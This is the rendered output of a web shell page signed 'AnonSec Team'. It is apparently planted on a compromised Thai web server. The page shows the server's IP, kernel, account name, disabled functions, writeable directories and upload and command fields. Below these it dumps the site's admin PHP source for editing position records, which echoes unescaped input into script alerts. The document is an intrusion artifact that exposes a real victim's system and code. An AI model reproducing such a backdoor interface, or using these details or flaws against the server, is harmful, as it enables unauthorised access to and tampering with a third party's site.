NG1NDEX
Server IP : 103.233.192.212  /  Your IP : 3.144.226.114
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sumpatuan/public_html/admin/top/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/sumpatuan/public_html/admin/top/action/save-ChartPositionMain-edit.php
<?php
require_once('session_backend_administrator.php');
header('Content-Type: text/html; charset=UTF-8');
date_default_timezone_set("Asia/Bangkok"); 
$datetime = date('d/m/Y H.i'); 

if($STT_login=="admin_login_true"){
    $data_id = trim($con_db_administrator->real_escape_string($_POST['edt_id']));
    $data_oldid = trim($con_db_administrator->real_escape_string($_POST['edt_oldid']));
    $data_name = trim($con_db_administrator->real_escape_string($_POST['edt_name']));

    $data_group = $con_db_administrator->real_escape_string($_POST['edt_group']);
    $data_group_explode = explode('|',$data_group);
    $data_idgroup = $data_group_explode[0];
    $data_namegroup = $data_group_explode[1];

    if(!isset($_POST['edt_id']) or !isset($_POST['edt_oldid']) or !isset($_POST['edt_name']) or  !isset($_POST['edt_group']) ){
        echo "<SCRIPT type='text/javascript'>
                alert('กรุณากรอกข้อมูลให้ครบ');
                window.location.replace(document.referrer);
            </SCRIPT>";
        exit;
    }else{

        /////// เช็คข้อมูล name ซ้ำ
        $sql_check_name = " SELECT COUNT(*) FROM `data_position` WHERE `name_position`='$data_name' AND `id_group_position`='$data_idgroup' AND `id_position`!='$data_oldid' ";
        $qr_check_name = mysqli_query($con_db_administrator, $sql_check_name) or trigger_error("sql_check_village", E_USER_ERROR);
        $rs_check_name = mysqli_fetch_row($qr_check_name);
        $check_name = $rs_check_name[0]; 
        // echo $check_name;
        // exit;
        if( $data_id == $data_oldid ){
            if($check_name >= 1){
                echo "<SCRIPT type='text/javascript'>
                        alert('ชื่อตำแหน่ง [ $data_name ] ในหน่วยงาน$data_namegroup ซ้ำ');
                        window.location.replace(document.referrer);
                    </SCRIPT>";
                exit;
            }else{
                /////// UPDATE DATA to SQL

                    $ud_data = " UPDATE `data_position` SET `name_position`='$data_name', `id_group_position`='$data_idgroup', `name_group_position`='$data_namegroup' WHERE `id_position`='$data_id' "; 
                    $action_ud_data = $con_db_administrator->query($ud_data);
                    if(!$action_ud_data){
                        echo "<SCRIPT type='text/javascript'>
                                alert('เกิดข้อผิดพลาด! แก้ไขข้อมูลไม่สำเร็จ');
                                window.location.replace(document.referrer);
                            </SCRIPT>";
                        exit;
                    }else{

                        /////// UPDATE DATA บุคคล
                        $ud_data_pst = " UPDATE `data_profile` SET `name_position_profile`='$data_name', `id_group_profile`='$data_idgroup', `name_group_profile`='$data_namegroup' WHERE `id_position_profile`='$data_id' ";  
                        $action_ud_data_pst = $con_db_administrator->query($ud_data_pst);

                        echo "<SCRIPT type='text/javascript'>
                                alert('แก้ไขข้อมูล [ $data_name ] สำเร็จ');
                                window.location.replace('../ChartPositionMain');
                            </SCRIPT>";
                        exit;
                    }
            }
        }else{

            /////// เช็คข้อมูล id ซ้ำ
            $sql_check_id = " SELECT COUNT(*) FROM `data_position` WHERE `id_position`='$data_id' ";
            $qr_check_id = mysqli_query($con_db_administrator, $sql_check_id) or trigger_error("sql_check_village", E_USER_ERROR);
            $rs_check_id = mysqli_fetch_row($qr_check_id);
            $check_id = $rs_check_id[0]; 
            if($check_id >= 1){
                echo "<SCRIPT type='text/javascript'>
                        alert('ลำดับตำแหน่ง [ $data_id ] ซ้ำ');
                        window.location.replace(document.referrer);
                    </SCRIPT>";
                exit;
            }else{
                    if($check_name >= 1){
                        echo "<SCRIPT type='text/javascript'>
                                alert('ชื่อตำแหน่ง [ $data_name ] ในหน่วยงาน$data_namegroup ซ้ำ');
                                window.location.replace(document.referrer);
                            </SCRIPT>";
                        exit;
                    }else{
                        /////// UPDATE DATA to SQL
        
                            $ud_data = " UPDATE `data_position` SET `id_position`='$data_id', `name_position`='$data_name', `id_group_position`='$data_idgroup', `name_group_position`='$data_namegroup' WHERE `id_position`='$data_oldid' "; 
                            $action_ud_data = $con_db_administrator->query($ud_data);
                            if(!$action_ud_data){
                                echo "<SCRIPT type='text/javascript'>
                                        alert('เกิดข้อผิดพลาด! แก้ไขข้อมูลไม่สำเร็จ');
                                        window.location.replace(document.referrer);
                                    </SCRIPT>";
                                exit;
                            }else{
        
                                /////// UPDATE DATA บุคคล
                                $ud_data_pst = " UPDATE `data_profile` SET `id_position_profile`='$data_id', `name_position_profile`='$data_name', `id_group_profile`='$data_idgroup', `name_group_profile`='$data_namegroup' WHERE `id_position_profile`='$data_oldid' ";  
                                $action_ud_data_pst = $con_db_administrator->query($ud_data_pst);
        
                                echo "<SCRIPT type='text/javascript'>
                                        alert('แก้ไขข้อมูล [ $data_name ] สำเร็จ');
                                        window.location.replace('../ChartPositionMain');
                                    </SCRIPT>";
                                exit;
                            }
                    }
            }
        }

    }
        
           

}else{
    echo "<SCRIPT type='text/javascript'>
        alert('กรุณาเข้าสู่ระบบ');
        window.location.replace('../../index');
    </SCRIPT>";
    exit;
}
mysqli_close($con_db_administrator);
?>

Anon7 - 2022
AnonSec Team